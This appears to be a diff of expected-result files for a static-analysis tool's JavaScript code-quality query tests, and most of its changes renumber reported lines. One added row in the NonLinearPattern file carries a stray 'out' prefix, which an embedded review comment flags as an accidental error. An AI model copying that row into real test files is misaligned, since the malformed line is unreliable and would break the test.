@@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. 
| +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected index 1bf8599b8be5..05bc8f28ad14 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected 
@@ -1,6 +1,6 @@ -| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. | -| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | -| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | +| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. | +| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | +| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected 
@@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 
--- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected index 6b028267ff76..4ed958a048a1 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected @@ -1,2 +1,2 @@ -| tst.js:6:15:6:15 | y | Parameter y is not documented. | -| tst.js:26:19:26:19 | y | Parameter y is not documented. | +| tst.js:4:15:4:15 | y | Parameter y is not documented. | +| tst.js:23:19:23:19 | y | Parameter y is not documented. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected 
@@ -1,3 +1,3 @@ -| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array | -| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null | -| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array | +| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array | +| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null | +| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected @@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected index 2af10be24c0d..c9b2667e9e74 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected 
@@ -1,7 +1,7 @@ -| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read | -| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read | -| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read | -| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read | -| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read | -| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read | -| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read | +| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read | +| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read | +| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read | +| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read | +| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read | +| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. 
| tst.js:46:43:46:46 | a[i] | read | +| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected index 2f61724a5661..740b5e5dafe7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected 
@@ -1,11 +1,11 @@ -| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | -| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound | -| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound | -| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound | -| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound | -| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound | -| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound | -| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound | -| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound | -| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound | +out| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound | +| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound | +| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound | +| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. 
| ts-test.ts:8:7:8:7 | x | previously bound | +| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound | +| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound | +| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound | +| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound | +| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound | +| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected index 9dcd49a99d3f..75d8c23b51f6 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected 
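Review bot: The first added row of NonLinearPattern.expected starts with `out| NonLinearPatternTS.ts:1:34:1:39 | number | ...`, so a stray `out` now precedes the leading `|`; every other row in this hunk starts with `| `. The removed row has the same location (1:34:1:39, bound at 1:23:1:28), so this line probably should not have changed at all and the prefix looks like an accidental keystroke rather than query output. If the test runner compares the file verbatim, this row will presumably not match the actual result. The row should begin `| NonLinearPatternTS.ts:1:34:1:39 | number |` as before.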
@@ -1,3 +1,3 @@ -| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. | -| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. | -| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. | +| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. | +| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. | +| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..30532ee8c952 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:12 | set x(v) {\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected 
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected index 92b3fc978773..b88dd7d68e80 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected 
@@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. 
| tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... 
.");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected 
@@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected index 4439f2c694b6..6efbbf8544bc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected 
@@ -1 +1 @@ -| tst.js:5:9:5:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | +| tst.js:4:9:4:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected index 5718da0e961c..22e149651e78 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected @@ -1,5 +1,5 @@ -| tst.js:14:10:14:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | -| tst.js:19:10:19:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | -| tst.js:24:10:24:14 | var p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:34:14:34:14 | p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:40:10:40:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:13:10:13:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | +| tst.js:17:10:17:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:21:10:21:14 | var p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:30:14:30:14 | p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:35:10:35:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | 
diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected index 4886857477f0..a4dd7cac42e7 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected @@ -1 +1 @@ -| tst.js:2:18:2:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:4:9:4:13 | start | is reassigned | +| tst.js:1:18:1:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:3:9:3:13 | start | is reassigned | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | 
diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected 